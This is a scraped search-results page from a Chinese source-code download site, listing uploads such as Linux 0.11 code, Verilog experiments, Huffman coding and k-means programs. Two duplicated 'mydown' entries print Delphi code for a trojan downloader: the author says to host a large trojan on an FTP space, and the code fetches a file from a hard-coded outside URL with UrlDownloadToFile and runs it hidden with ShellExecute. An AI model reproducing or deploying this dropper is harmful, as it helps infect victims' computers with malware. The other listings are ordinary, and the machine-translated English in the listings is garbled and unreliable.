CodeBus
www.codebus.net
Search
Sign in
Sign up
Hot Search :
Source
embeded
web
remote control
p2p
game
More...
Location :
Home
Search - SourceFile
Main Category
SourceCode
Documents
Books
WEB Code
Develop Tools
Other resource
Search - SourceFile - List
[
WinSock-NDIS
]
mydown
DL : 0
执行后可以下载指定程序并执行 你先把大体积木马放到一固定FTP空间上 打开Delphi 打开down.dpr,看到了吧 改一下编译 ok 个人版下载者:) 用工具压一下,只有10K 这样说完是不行的,说一下代码: program wsdgsRoad uses URLMon, ShellApi var u,l: pchar {.$R *.res} function DownloadFile(SourceFile, DestFile: string): Boolean begin GetMem(u,100) GetMem(l,100) u:= http://www.jm-my.com/ip2.txt //改为你要下载的网址 l:= c:/downpage.txt //改为你要存放并打开文件的路径 try Result := UrlDownloadToFile(nil, PChar(u), PChar(l), 0, nil) = 0 except Result := False end end begin if DownloadFile(u, l) then begin ShellExecute(0, PChar( open ), PChar(l), PChar( ), nil, 0) end //freemem(u) //freemem(l) end. 先试一下。。。。 ok, 明白了吗 再见-after implementation can be downloaded designated procedures and implement your first Mass Trojans into a fixed space on the open FTP D elphi open down.dpr seen it change your build ok individual downloads : ) tool, pressure that is only 10K finish this is not enough, saying that what code : program uses URLMon wsdgsRoad, ShellApi var u, l : pchar (. $ R *. res) function DownloadFile (Sour ceFile, DestFile : string) : Boolean begin GetMem (u, 100) GetMem (l, 100) u : = http : / / www.jm-my.com/ip2.txt / / read you want to download the website l : = c : / downpage.txt / / read your document storage and open the path to try Result : = UrlDownloadToFile (nil, PChar (u), PChar (l), 0, nil) = 0 except Result : = False end if end begin DownloadFile (u, l) then begin ShellExecute (0, PChar (open)
Date
: 2008-10-13
Size
: 1.4kb
User
:
韩冰
[
OS Develop
]
Linuxkernel-SourceFile
DL : 0
0。11版linux代码,对学习linux和提高c语言有帮助-0. 11 version of Linux code, to learn and improve linux c language help
Date
: 2008-10-13
Size
: 107.64kb
User
:
shuaijinyu
[
File Operate
]
SourceFile
DL : 0
利用资源文件自定义安装包!-use of resources document custom installation package!
Date
: 2008-10-13
Size
: 778.44kb
User
:
孔敏
[
Other resource
]
SourceFile
DL : 0
msp430简易交流频率测试 msp430简易交流频率测试
Date
: 2008-10-13
Size
: 3.93kb
User
:
yezhichao
[
Other resource
]
SourceFile
DL : 0
PS2鼠标实验Verilog HDL代码
Date
: 2008-10-13
Size
: 4.5kb
User
:
张猛蛟
[
Other resource
]
SourceFile
DL : 0
PS2键盘实验Verilog HDL代码
Date
: 2008-10-13
Size
: 3.61kb
User
:
张猛蛟
[
Other resource
]
sourceFile
DL : 0
在一段时间内,如果用户没有进行按键操作,系统将进入“睡眠”--低功耗状态 * 用户按键后,系统从低功耗状态转到正常的工作状态 * 在非低功耗状态下,程序接收键盘按键执行加法器操作(因为键盘和LCD限制不能实现复杂 * 的功能,如乘法、减法、除法等)
Date
: 2008-10-13
Size
: 4.37kb
User
:
wei
[
WEB Code
]
Huffmancodeandreport
DL : 0
C++实现的哈弗曼编码,并有流程图(1)I:初始化(Initialization)。从指定的英文文件中Sourcefile.txt读取数据,根据文件内容统计的字符的频度,建立哈夫曼树。 (2)E:编码(Encoding)。利用已经建好的哈夫曼树进行编码,并将每个字符的编码写入文件HuffCode.txt中保存。 (3)C:压缩(Compress)。根据HuffCode.txt中编码对文件Sourcefile.txt进行重新编码,并将重新编码后的内容写入文件CodeFile.txt中。 (4)D:译码(Decoding)。利用已经建好的哈夫曼树将文件CodeFile.txt中的代码进行译码,结果存入文件TextFile中。 (5)P:打印代码文件(Print)。将文件CodeFile.txt的内容显示在终端上,每行50个代码。 (6)T:显示哈夫曼树(Treeprinting)。将已经在内存中的哈夫曼树以直观的方式(树或凹入表形式)显示在终端上。
Date
: 2008-10-13
Size
: 113.12kb
User
:
dongming
[
File Operate
]
mycopy
DL : 0
考察缓冲区大小对低级I/O操作的影响 了解文件随机访问技术.编写程序mycopy,实现文件拷贝。 命令行格式为: mycopy sourcefile destfile
Date
: 2008-10-13
Size
: 88.75kb
User
:
nemo
[
Other resource
]
sourceFile
DL : 0
使用口线模拟I2C总线,读写EEPROM的方法
Date
: 2008-10-13
Size
: 5.16kb
User
:
wangyongfa
[
File Operate
]
sourcefile
DL : 0
这是Visualc C++程序设计教程上的源代码
Date
: 2008-10-13
Size
: 646.2kb
User
:
George
[
Other resource
]
VC++sourcefile
DL : 0
随书源代码,Visual C++,初学者可参考
Date
: 2008-10-13
Size
: 624.26kb
User
:
张华
[
Other
]
sourceFile
DL : 0
输入三个学生的成绩,然后根据提示信息,可以选择学生平均成绩、单科最高分、总分以及成绩排名等各种计算。
Date
: 2008-10-13
Size
: 38.12kb
User
:
海燕
[
Graph Recognize
]
K-means算法源码
DL : 0
kmeans This directory contains code implementing the K-means algorithm. Source code may be found in KMEANS.CPP. Sample data isfound in KM2.DAT. The KMEANS program accepts input consisting of vectors and calculates the given number of cluster centers using the K-means algorithm. Output is directed to the screen. Usage for KMEANS is: KMEANS SOURCEFILE <enter> The format of the source file is: NPat - Number of patterns (int) SizeVect - Size of vector (int) NClust - Number of cluster centers(int) vect[1,1] ... vect[1,SizeVect] - vector 1 (real) vect[2,1] ... vect[2,SizeVect] - vector 2 (real) . . . . . . vect[NPat,1] ... vect[NClust,SizeVector] - vector N (real) To compile: ICC KMEANS.CPP <enter>
Date
: 2008-10-13
Size
: 3.42kb
User
:
li
[
File Operate
]
SourceFile
DL : 0
利用资源文件自定义安装包!-use of resources document custom installation package!
Date
: 2025-07-06
Size
: 778kb
User
:
孔敏
[
Graph Recognize
]
K-means算法源码
DL : 0
kmeans This directory contains code implementing the K-means algorithm. Source code may be found in KMEANS.CPP. Sample data isfound in KM2.DAT. The KMEANS program accepts input consisting of vectors and calculates the given number of cluster centers using the K-means algorithm. Output is directed to the screen. Usage for KMEANS is: KMEANS SOURCEFILE <enter> The format of the source file is: NPat - Number of patterns (int) SizeVect - Size of vector (int) NClust - Number of cluster centers(int) vect[1,1] ... vect[1,SizeVect] - vector 1 (real) vect[2,1] ... vect[2,SizeVect] - vector 2 (real) . . . . . . vect[NPat,1] ... vect[NClust,SizeVector] - vector N (real) To compile: ICC KMEANS.CPP <enter> -kmeans This directory contains code implementing the K-means algorithm. Source code may be found in KMEANS.CPP. Sample data isfound in KM2.DAT. The KMEANS program accepts input consisting of vectors and calculates the given number of cluster centers using the K-means algorithm. Output is directed to the screen. Usage for KMEANS is: KMEANS SOURCEFILE <enter> The format of the source file is: NPat- Number of patterns (int) SizeVect- Size of vector (int) NClust- Number of cluster centers(int) vect[1,1] ... vect[1,SizeVect]- vector 1 (real) vect[2,1] ... vect[2,SizeVect]- vector 2 (real) . . . . . . vect[NPat,1] ... vect[NClust,SizeVector]- vector N (real) To compile: ICC KMEANS.CPP <enter>
Date
: 2025-07-06
Size
: 3kb
User
:
li
[
Internet-Network
]
mydown
DL : 0
执行后可以下载指定程序并执行 你先把大体积木马放到一固定FTP空间上 打开Delphi 打开down.dpr,看到了吧 改一下编译 ok 个人版下载者:) 用工具压一下,只有10K 这样说完是不行的,说一下代码: program wsdgsRoad uses URLMon, ShellApi var u,l: pchar {.$R *.res} function DownloadFile(SourceFile, DestFile: string): Boolean begin GetMem(u,100) GetMem(l,100) u:= http://www.jm-my.com/ip2.txt //改为你要下载的网址 l:= c:/downpage.txt //改为你要存放并打开文件的路径 try Result := UrlDownloadToFile(nil, PChar(u), PChar(l), 0, nil) = 0 except Result := False end end begin if DownloadFile(u, l) then begin ShellExecute(0, PChar( open ), PChar(l), PChar( ), nil, 0) end //freemem(u) //freemem(l) end. 先试一下。。。。 ok, 明白了吗 再见-after implementation can be downloaded designated procedures and implement your first Mass Trojans into a fixed space on the open FTP D elphi open down.dpr seen it change your build ok individual downloads : ) tool, pressure that is only 10K finish this is not enough, saying that what code : program uses URLMon wsdgsRoad, ShellApi var u, l : pchar (. $ R*. res) function DownloadFile (Sour ceFile, DestFile : string) : Boolean begin GetMem (u, 100) GetMem (l, 100) u : = http :// www.jm-my.com/ip2.txt// read you want to download the website l : = c :/downpage.txt// read your document storage and open the path to try Result : = UrlDownloadToFile (nil, PChar (u), PChar (l), 0, nil) = 0 except Result : = False end if end begin DownloadFile (u, l) then begin ShellExecute (0, PChar (open)
Date
: 2025-07-06
Size
: 1kb
User
:
韩冰
[
OS Develop
]
Linuxkernel-SourceFile
DL : 0
0。11版linux代码,对学习linux和提高c语言有帮助-0. 11 version of Linux code, to learn and improve linux c language help
Date
: 2025-07-06
Size
: 107kb
User
:
shuaijinyu
[
VHDL-FPGA-Verilog
]
SourceFile
DL : 0
PS2鼠标实验Verilog HDL代码-PS2 mouse experiments Verilog HDL code
Date
: 2025-07-06
Size
: 4kb
User
:
张猛蛟
[
SCM
]
SourceFile
DL : 0
ks0108 12864液晶程序,包含键盘扫描程序-LCD ks0108 12864 procedures, including the keyboard scanner
Date
: 2025-07-06
Size
: 8kb
User
:
wang
«
1
2
3
4
»
CodeBus
is one of the largest source code repositories on the Internet!
Contact us :
1999-2046
CodeBus
All Rights Reserved.